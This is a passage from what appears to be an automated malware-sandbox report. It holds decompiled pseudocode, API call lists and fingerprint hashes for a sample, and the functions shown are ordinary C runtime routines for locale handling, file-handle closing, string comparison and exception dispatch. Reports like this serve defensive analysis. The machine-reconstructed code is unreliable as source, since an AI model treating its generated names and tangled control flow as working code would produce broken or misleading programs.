                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				void* _t38;
                        				signed int _t45;
                        				signed int _t60;
                        				intOrPtr _t77;
                        				void* _t80;
                        				intOrPtr* _t82;
                        				signed int _t83;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				void* _t92;
                        
                        				_t80 = __edx;
                        				_push(__ebx);
                        				_push(__esi);
                        				_t86 = 0;
                        				if(_a12 <= 0) {
                        					L5:
                        					return _t38;
                        				} else {
                        					_push(__edi);
                        					_t82 =  &_a12;
                        					while(1) {
                        						_t82 = _t82 + 4;
                        						_t38 = E01072387(_a4, _a8,  *_t82);
                        						_t92 = _t92 + 0xc;
                        						if(_t38 != 0) {
                        							break;
                        						}
                        						_t86 = _t86 + 1;
                        						if(_t86 < _a12) {
                        							continue;
                        						} else {
                        							goto L5;
                        						}
                        						goto L20;
                        					}
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					E01064748(0, _t80);
                        					asm("int3");
                        					_push(0x14);
                        					_push(0x107e528);
                        					E010668F0(0, _t82, _t86);
                        					_t66 = 0;
                        					_v32 = 0;
                        					__eflags = _a4 - 5;
                        					if(__eflags <= 0) {
                        						_t88 = E0106B2AD(_t80, _t82, __eflags);
                        						_v36 = _t88;
                        						E010702E6(0, _t80, _t82, _t88, __eflags);
                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                        						_v8 = _v8 & 0;
                        						_t83 = E01064F0A(0xb8, 1);
                        						_v40 = _t83;
                        						__eflags = _t83;
                        						if(_t83 != 0) {
                        							E01064D39(0xc);
                        							_v8 = 1;
                        							E010755D5(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                        							_v8 = _v8 & 0x00000000;
                        							E01075D12();
                        							_t66 = E01075ECD(0, _t80, _t83, _t88, _t83, _a4, _a8);
                        							_v32 = _t66;
                        							__eflags = _t66;
                        							if(_t66 == 0) {
                        								E0107024B(_t83);
                        								_t43 = E010700F1(_t83);
                        							} else {
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									_t60 = E010796BD(_a8, 0x1080bd0);
                        									__eflags = _t60;
                        									if(_t60 != 0) {
                        										 *0x1081c2c = 1;
                        									}
                        								}
                        								E01064D39(0xc);
                        								_v8 = 2;
                        								_t25 = _t88 + 0x6c; // 0x6c
                        								E01070362(_t25, _t83);
                        								E0107024B(_t83);
                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                        									__eflags =  *0x1080e04 & 0x00000001;
                        									if(( *0x1080e04 & 0x00000001) == 0) {
                        										E01070362(0x1080d3c,  *((intOrPtr*)(_t88 + 0x6c)));
                        										_t77 =  *0x1080d3c; // 0x1080d40
                        										_t32 = _t77 + 0x84; // 0x1080e30
                        										 *0x1080e28 =  *_t32;
                        										_t33 = _t77 + 0x90; // 0x107c400
                        										 *0x1080678 =  *_t33;
                        										_t34 = _t77 + 0x74; // 0x1
                        										 *0x1080e00 =  *_t34;
                        									}
                        								}
                        								_v8 = _v8 & 0x00000000;
                        								_t43 = E01075D21();
                        							}
                        						}
                        						_v8 = 0xfffffffe;
                        						E01075D54(_t43, _t88);
                        						_t45 = _t66;
                        					} else {
                        						 *((intOrPtr*)(E010647CC(__eflags))) = 0x16;
                        						E0106471D();
                        						_t45 = 0;
                        					}
                        					return E01066935(_t45);
                        				}
                        				L20:
                        			}


















                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 790675137-0
                        • Opcode ID: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction ID: 44c9edf2cae7b300ca5cc1bfbfcae5c5fbaa916b790161151fbfcaac399cd8b0
                        • Opcode Fuzzy Hash: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction Fuzzy Hash: DB410272D0430AAFDB20BFA8DC84BDD37E4BF14314F108569F9C896180DB7699028B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E010727FD(void* __eflags, signed int _a4) {
                        				void* _t12;
                        				signed int _t13;
                        				signed int _t16;
                        				intOrPtr _t18;
                        				void* _t22;
                        				signed int _t35;
                        				long _t40;
                        
                        				_t13 = E01066594(_t12);
                        				if(_t13 >= 0) {
                        					_t35 = _a4;
                        					if(E01070E34(_t35) == 0xffffffff) {
                        						L10:
                        						_t40 = 0;
                        					} else {
                        						_t18 =  *0x1081c60;
                        						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                        							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                        								goto L8;
                        							} else {
                        								goto L7;
                        							}
                        						} else {
                        							L7:
                        							_t22 = E01070E34(2);
                        							if(E01070E34(1) == _t22) {
                        								goto L10;
                        							} else {
                        								L8:
                        								if(CloseHandle(E01070E34(_t35)) != 0) {
                        									goto L10;
                        								} else {
                        									_t40 = GetLastError();
                        								}
                        							}
                        						}
                        					}
                        					E01070DAE(_t35);
                        					 *((char*)( *((intOrPtr*)(0x1081c60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                        					if(_t40 == 0) {
                        						_t16 = 0;
                        					} else {
                        						_t16 = E010647AB(_t40) | 0xffffffff;
                        					}
                        					return _t16;
                        				} else {
                        					return _t13 | 0xffffffff;
                        				}
                        			}











                        APIs
                        • __ioinit.LIBCMT ref: 01072800
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 010665A2
                        • __get_osfhandle.LIBCMT ref: 01072814
                        • __get_osfhandle.LIBCMT ref: 0107283F
                        • __get_osfhandle.LIBCMT ref: 01072848
                        • __get_osfhandle.LIBCMT ref: 01072854
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,01071CC9,?,?,?,?,?,?,?,?,?,?,00000109), ref: 0107285B
                        • GetLastError.KERNEL32(?,01071CC9,?,?,?,?,?,?,?,?,?,?,00000109), ref: 01072865
                        • __free_osfhnd.LIBCMT ref: 01072872
                        • __dosmaperr.LIBCMT ref: 01072894
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                        • String ID:
                        • API String ID: 974577687-0
                        • Opcode ID: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction ID: 9fef578164fdaac27f12ba87d1b6efbd86cbd04ca8f238af5d800b99a46bf208
                        • Opcode Fuzzy Hash: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction Fuzzy Hash: 4D114C32E0721405D2E1227CA8447BE7B895FA2B34F15039DF9E9D71CADA77E881C358
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E010619F0(WCHAR* _a4, char* _a8) {
                        				int _t11;
                        				int _t18;
                        				void* _t26;
                        				int _t28;
                        
                        				_t28 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                        				if(_t28 != 0) {
                        					_t11 = lstrlenW(_a4);
                        					_t3 = _t28 - 1; // -1
                        					if(_t11 < _t3) {
                        						goto L1;
                        					} else {
                        						_t26 = HeapAlloc(GetProcessHeap(), 0, _t28 + _t28);
                        						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t26, _t28);
                        						_t6 = _t28 - 1; // -1
                        						_t18 = CompareStringW(GetThreadLocale(), 1, _a4, _t6, _t26, _t6);
                        						HeapFree(GetProcessHeap(), 0, _t26);
                        						return 0 | _t18 == 0x00000002;
                        					}
                        				} else {
                        					L1:
                        					return 0;
                        				}
                        			}








                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A01
                        • lstrlenW.KERNEL32(?), ref: 01061A17
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A2B
                        • HeapAlloc.KERNEL32(00000000), ref: 01061A32
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A45
                        • GetThreadLocale.KERNEL32(00000001,?,-00000001,00000000,-00000001), ref: 01061A56
                        • CompareStringW.KERNEL32(00000000), ref: 01061A5D
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A68
                        • HeapFree.KERNEL32(00000000), ref: 01061A6F
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction ID: 50280af81effd8d66e6d83fbd8a61d2c07757c83eaa4250eec8d050b21c0e330
                        • Opcode Fuzzy Hash: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction Fuzzy Hash: 20118072944215BBDB321BB4EC0DF9B7B6DEB48762F104614F7A5EA0C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061960(WCHAR* _a4, char* _a8) {
                        				int _t10;
                        				int _t17;
                        				void* _t24;
                        				int _t26;
                        
                        				_t26 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                        				if(_t26 != 0) {
                        					_t10 = lstrlenW(_a4);
                        					_t3 = _t26 - 1; // -1
                        					if(_t10 != _t3) {
                        						goto L1;
                        					} else {
                        						_t24 = HeapAlloc(GetProcessHeap(), 0, _t26 + _t26);
                        						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t24, _t26);
                        						_t17 = CompareStringW(GetThreadLocale(), 1, _a4, _t26, _t24, _t26);
                        						HeapFree(GetProcessHeap(), 0, _t24);
                        						return 0 | _t17 == 0x00000002;
                        					}
                        				} else {
                        					L1:
                        					return 0;
                        				}
                        			}








                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061971
                        • lstrlenW.KERNEL32(?), ref: 01061987
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0106199B
                        • HeapAlloc.KERNEL32(00000000), ref: 010619A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010619B5
                        • GetThreadLocale.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 010619C3
                        • CompareStringW.KERNEL32(00000000), ref: 010619CA
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010619D5
                        • HeapFree.KERNEL32(00000000), ref: 010619DC
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction ID: 888bccb101bcd1cd35b9d403740cb586c337398a57f3fe73a3903366a2ceca2a
                        • Opcode Fuzzy Hash: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction Fuzzy Hash: 05014032944214BBDB321BB4AC0DF9B7F6DEF45761F104611F6A5EA1C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E004038EB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                        				signed char* _v0;
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				intOrPtr _v56;
                        				intOrPtr _v60;
                        				void _v64;
                        				signed int _v68;
                        				char _v84;
                        				intOrPtr _v88;
                        				signed int _v92;
                        				intOrPtr _v100;
                        				void _v104;
                        				intOrPtr* _v112;
                        				signed char* _v184;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t201;
                        				signed int _t202;
                        				char _t203;
                        				signed int _t205;
                        				signed int _t207;
                        				signed char* _t208;
                        				signed int _t209;
                        				signed int _t210;
                        				signed int _t214;
                        				void* _t217;
                        				signed char* _t220;
                        				void* _t222;
                        				void* _t224;
                        				signed char _t228;
                        				signed int _t229;
                        				void* _t231;
                        				void* _t234;
                        				void* _t237;
                        				signed int _t247;
                        				void* _t250;
                        				intOrPtr* _t251;
                        				signed int _t252;
                        				intOrPtr _t253;
                        				signed int _t254;
                        				void* _t259;
                        				void* _t264;
                        				void* _t265;
                        				signed int _t269;
                        				signed char* _t270;
                        				intOrPtr* _t271;
                        				signed char _t272;
                        				signed int _t273;
                        				signed int _t274;
                        				intOrPtr* _t276;
                        				signed int _t277;
                        				signed int _t278;
                        				signed int _t283;
                        				signed int _t290;
                        				signed int _t291;
                        				signed int _t294;
                        				signed int _t296;
                        				signed char* _t297;
                        				signed int _t298;
                        				signed char _t299;
                        				signed int* _t301;
                        				signed char* _t304;
                        				signed int _t314;
                        				signed int _t315;
                        				signed int _t317;
                        				signed int _t327;
                        				void* _t329;
                        				void* _t331;
                        				void* _t332;
                        				void* _t333;
                        				void* _t334;
                        
                        				_t296 = __edx;
                        				_push(_t315);
                        				_t301 = _a20;
                        				_v20 = 0;
                        				_v28 = 0;
                        				_t275 = E004044A9(_a8, _a16, _t301);
                        				_t332 = _t331 + 0xc;
                        				_v12 = _t275;
                        				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                        					L67:
                        					_t201 = E0040579A(_t270, _t275, _t296, _t315);
                        					asm("int3");
                        					_t329 = _t332;
                        					_t333 = _t332 - 0x38;
                        					_push(_t270);
                        					_t271 = _v112;
                        					__eflags =  *_t271 - 0x80000003;
                        					if( *_t271 == 0x80000003) {
                        						return _t201;
                        					} else {
                        						_push(_t315);
                        						_push(_t301);
                        						_t202 = E004029B3(_t271, _t275, _t296, _t315);
                        						__eflags =  *(_t202 + 8);
                        						if( *(_t202 + 8) != 0) {
                        							__imp__EncodePointer(0);
                        							_t315 = _t202;
                        							_t222 = E004029B3(_t271, _t275, _t296, _t315);
                        							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                        							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                        								__eflags =  *_t271 - 0xe0434f4d;
                        								if( *_t271 != 0xe0434f4d) {
                        									__eflags =  *_t271 - 0xe0434352;
                        									if( *_t271 != 0xe0434352) {
                        										_t214 = E00402E31(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                        										_t333 = _t333 + 0x1c;
                        										__eflags = _t214;
                        										if(_t214 != 0) {
                        											L84:
                        											return _t214;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						_t203 = _a16;
                        						_v28 = _t203;
                        						_v24 = 0;
                        						__eflags =  *(_t203 + 0xc);
                        						if( *(_t203 + 0xc) > 0) {
                        							_push(_a24);
                        							E00402D64(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                        							_t298 = _v40;
                        							_t334 = _t333 + 0x18;
                        							_t214 = _v44;
                        							_v20 = _t214;
                        							_v12 = _t298;
                        							__eflags = _t298 - _v32;
                        							if(_t298 >= _v32) {
                        								goto L84;
                        							}
                        							_t277 = _t298 * 0x14;
                        							__eflags = _t277;
                        							_v16 = _t277;
                        							do {
                        								_t278 = 5;
                        								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                        								_t334 = _t334 + 0xc;
                        								__eflags = _v64 - _t217;
                        								if(_v64 > _t217) {
                        									goto L83;
                        								}
                        								__eflags = _t217 - _v60;
                        								if(_t217 > _v60) {
                        									goto L83;
                        								}
                        								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                        								_t283 = _t220[4];
                        								__eflags = _t283;
                        								if(_t283 == 0) {
                        									L81:
                        									__eflags =  *_t220 & 0x00000040;
                        									if(( *_t220 & 0x00000040) == 0) {
                        										_push(0);
                        										_push(1);
                        										E0040386B(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                        										_t298 = _v12;
                        										_t334 = _t334 + 0x30;
                        									}
                        									goto L83;
                        								}
                        								__eflags =  *((char*)(_t283 + 8));
                        								if( *((char*)(_t283 + 8)) != 0) {
                        									goto L83;
                        								}
                        								goto L81;
                        								L83:
                        								_t298 = _t298 + 1;
                        								_t214 = _v20;
                        								_t277 = _v16 + 0x14;
                        								_v12 = _t298;
                        								_v16 = _t277;
                        								__eflags = _t298 - _v32;
                        							} while (_t298 < _v32);
                        							goto L84;
                        						}
                        						E0040579A(_t271, _t275, _t296, _t315);
                        						asm("int3");
                        						_push(_t329);
                        						_t297 = _v184;
                        						_push(_t271);
                        						_push(_t315);
                        						_push(0);
                        						_t205 = _t297[4];
                        						__eflags = _t205;
                        						if(_t205 == 0) {
                        							L109:
                        							_t207 = 1;
                        							__eflags = 1;
                        						} else {
                        							_t276 = _t205 + 8;
                        							__eflags =  *_t276;
                        							if( *_t276 == 0) {
                        								goto L109;
                        							} else {
                        								__eflags =  *_t297 & 0x00000080;
                        								_t304 = _v0;
                        								if(( *_t297 & 0x00000080) == 0) {
                        									L91:
                        									_t272 = _t304[4];
                        									_t317 = 0;
                        									__eflags = _t205 - _t272;
                        									if(_t205 == _t272) {
                        										L101:
                        										__eflags =  *_t304 & 0x00000002;
                        										if(( *_t304 & 0x00000002) == 0) {
                        											L103:
                        											_t208 = _a4;
                        											__eflags =  *_t208 & 0x00000001;
                        											if(( *_t208 & 0x00000001) == 0) {
                        												L105:
                        												__eflags =  *_t208 & 0x00000002;
                        												if(( *_t208 & 0x00000002) == 0) {
                        													L107:
                        													_t317 = 1;
                        													__eflags = 1;
                        												} else {
                        													__eflags =  *_t297 & 0x00000002;
                        													if(( *_t297 & 0x00000002) != 0) {
                        														goto L107;
                        													}
                        												}
                        											} else {
                        												__eflags =  *_t297 & 0x00000001;
                        												if(( *_t297 & 0x00000001) != 0) {
                        													goto L105;
                        												}
                        											}
                        										} else {
                        											__eflags =  *_t297 & 0x00000008;
                        											if(( *_t297 & 0x00000008) != 0) {
                        												goto L103;
                        											}
                        										}
                        										_t207 = _t317;
                        									} else {
                        										_t184 = _t272 + 8; // 0x6e
                        										_t209 = _t184;
                        										while(1) {
                        											_t273 =  *_t276;
                        											__eflags = _t273 -  *_t209;
                        											if(_t273 !=  *_t209) {
                        												break;
                        											}
                        											__eflags = _t273;
                        											if(_t273 == 0) {
                        												L97:
                        												_t210 = _t317;
                        											} else {
                        												_t274 =  *((intOrPtr*)(_t276 + 1));
                        												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                        												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                        													break;
                        												} else {
                        													_t276 = _t276 + 2;
                        													_t209 = _t209 + 2;
                        													__eflags = _t274;
                        													if(_t274 != 0) {
                        														continue;
                        													} else {
                        														goto L97;
                        													}
                        												}
                        											}
                        											L99:
                        											__eflags = _t210;
                        											if(_t210 == 0) {
                        												goto L101;
                        											} else {
                        												_t207 = 0;
                        											}
                        											goto L110;
                        										}
                        										asm("sbb eax, eax");
                        										_t210 = _t209 | 0x00000001;
                        										__eflags = _t210;
                        										goto L99;
                        									}
                        								} else {
                        									__eflags =  *_t304 & 0x00000010;
                        									if(( *_t304 & 0x00000010) != 0) {
                        										goto L109;
                        									} else {
                        										goto L91;
                        									}
                        								}
                        							}
                        						}
                        						L110:
                        						return _t207;
                        					}
                        				} else {
                        					_t270 = _a4;
                        					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                        						L22:
                        						_t296 = _a12;
                        						_v8 = _t296;
                        						goto L24;
                        					} else {
                        						_t315 = 0;
                        						if(_t270[0x1c] != 0) {
                        							goto L22;
                        						} else {
                        							_t224 = E004029B3(_t270, _t275, _t296, 0);
                        							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                        								L61:
                        								return _t224;
                        							} else {
                        								_t270 =  *(E004029B3(_t270, _t275, _t296, 0) + 0x10);
                        								_t259 = E004029B3(_t270, _t275, _t296, 0);
                        								_v28 = 1;
                        								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                        								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                        									goto L67;
                        								} else {
                        									if( *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
                        										L23:
                        										_t296 = _v8;
                        										_t275 = _v12;
                        										L24:
                        										_v52 = _t301;
                        										_v48 = 0;
                        										__eflags =  *_t270 - 0xe06d7363;
                        										if( *_t270 != 0xe06d7363) {
                        											L57:
                        											__eflags = _t301[3];
                        											if(_t301[3] <= 0) {
                        												goto L60;
                        											} else {
                        												__eflags = _a24;
                        												if(_a24 != 0) {
                        													goto L67;
                        												} else {
                        													_push(_a32);
                        													_push(_a28);
                        													_push(_t275);
                        													_push(_t301);
                        													_push(_a16);
                        													_push(_t296);
                        													_push(_a8);
                        													_push(_t270);
                        													L68();
                        													_t332 = _t332 + 0x20;
                        													goto L60;
                        												}
                        											}
                        										} else {
                        											__eflags = _t270[0x10] - 3;
                        											if(_t270[0x10] != 3) {
                        												goto L57;
                        											} else {
                        												__eflags = _t270[0x14] - 0x19930520;
                        												if(_t270[0x14] == 0x19930520) {
                        													L29:
                        													_t315 = _a32;
                        													__eflags = _t301[3];
                        													if(_t301[3] > 0) {
                        														_push(_a28);
                        														E00402D64(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                        														_t296 = _v64;
                        														_t332 = _t332 + 0x18;
                        														_t247 = _v68;
                        														_v44 = _t247;
                        														_v16 = _t296;
                        														__eflags = _t296 - _v56;
                        														if(_t296 < _v56) {
                        															_t290 = _t296 * 0x14;
                        															__eflags = _t290;
                        															_v32 = _t290;
                        															do {
                        																_t291 = 5;
                        																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                        																_t332 = _t332 + 0xc;
                        																__eflags = _v104 - _t250;
                        																if(_v104 <= _t250) {
                        																	__eflags = _t250 - _v100;
                        																	if(_t250 <= _v100) {
                        																		_t294 = 0;
                        																		_v20 = 0;
                        																		__eflags = _v92;
                        																		if(_v92 != 0) {
                        																			_t299 = _t270[0x1c];
                        																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                        																			_t252 = _t251 + 4;
                        																			__eflags = _t252;
                        																			_v36 = _t252;
                        																			_t253 = _v88;
                        																			_v40 =  *_t251;
                        																			_v24 = _t253;
                        																			do {
                        																				asm("movsd");
                        																				asm("movsd");
                        																				asm("movsd");
                        																				asm("movsd");
                        																				_t327 = _v40;
                        																				_t314 = _v36;
                        																				__eflags = _t327;
                        																				if(_t327 <= 0) {
                        																					goto L40;
                        																				} else {
                        																					while(1) {
                        																						_push(_t299);
                        																						_push( *_t314);
                        																						_t254 =  &_v84;
                        																						_push(_t254);
                        																						L87();
                        																						_t332 = _t332 + 0xc;
                        																						__eflags = _t254;
                        																						if(_t254 != 0) {
                        																							break;
                        																						}
                        																						_t299 = _t270[0x1c];
                        																						_t327 = _t327 - 1;
                        																						_t314 = _t314 + 4;
                        																						__eflags = _t327;
                        																						if(_t327 > 0) {
                        																							continue;
                        																						} else {
                        																							_t294 = _v20;
                        																							_t253 = _v24;
                        																							goto L40;
                        																						}
                        																						goto L43;
                        																					}
                        																					_push(_a24);
                        																					_push(_v28);
                        																					E0040386B(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                        																					_t332 = _t332 + 0x30;
                        																				}
                        																				L43:
                        																				_t296 = _v16;
                        																				goto L44;
                        																				L40:
                        																				_t294 = _t294 + 1;
                        																				_t253 = _t253 + 0x10;
                        																				_v20 = _t294;
                        																				_v24 = _t253;
                        																				__eflags = _t294 - _v92;
                        																			} while (_t294 != _v92);
                        																			goto L43;
                        																		}
                        																	}
                        																}
                        																L44:
                        																_t296 = _t296 + 1;
                        																_t247 = _v44;
                        																_t290 = _v32 + 0x14;
                        																_v16 = _t296;
                        																_v32 = _t290;
                        																__eflags = _t296 - _v56;
                        															} while (_t296 < _v56);
                        															_t301 = _a20;
                        															_t315 = _a32;
                        														}
                        													}
                        													__eflags = _a24;
                        													if(__eflags != 0) {
                        														_push(1);
                        														E0040263C(_t270, _t301, _t315, __eflags);
                        														_t275 = _t270;
                        													}
                        													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                        													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                        														L60:
                        														_t224 = E004029B3(_t270, _t275, _t296, _t315);
                        														__eflags =  *(_t224 + 0x1c);
                        														if( *(_t224 + 0x1c) != 0) {
                        															goto L67;
                        														} else {
                        															goto L61;
                        														}
                        													} else {
                        														_t228 = _t301[8] >> 2;
                        														__eflags = _t301[7];
                        														if(_t301[7] != 0) {
                        															__eflags = _t228 & 0x00000001;
                        															if((_t228 & 0x00000001) == 0) {
                        																_push(_t301[7]);
                        																_t229 = E0040436A(_t270, _t301, _t315, _t270);
                        																_pop(_t275);
                        																__eflags = _t229;
                        																if(_t229 == 0) {
                        																	goto L64;
                        																} else {
                        																	goto L60;
                        																}
                        															} else {
                        																goto L54;
                        															}
                        														} else {
                        															__eflags = _t228 & 0x00000001;
                        															if((_t228 & 0x00000001) == 0) {
                        																goto L60;
                        															} else {
                        																__eflags = _a28;
                        																if(_a28 != 0) {
                        																	goto L60;
                        																} else {
                        																	L54:
                        																	 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                        																	_t237 = E004029B3(_t270, _t275, _t296, _t315);
                        																	_t286 = _v8;
                        																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                        																	goto L62;
                        																}
                        															}
                        														}
                        													}
                        												} else {
                        													__eflags = _t270[0x14] - 0x19930521;
                        													if(_t270[0x14] == 0x19930521) {
                        														goto L29;
                        													} else {
                        														__eflags = _t270[0x14] - 0x19930522;
                        														if(_t270[0x14] != 0x19930522) {
                        															goto L57;
                        														} else {
                        															goto L29;
                        														}
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										_v16 =  *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c));
                        										_t264 = E004029B3(_t270, _t275, _t296, _t315);
                        										_push(_v16);
                        										 *(_t264 + 0x1c) = _t315;
                        										_t265 = E0040436A(_t270, _t301, _t315, _t270);
                        										_pop(_t286);
                        										if(_t265 != 0) {
                        											goto L23;
                        										} else {
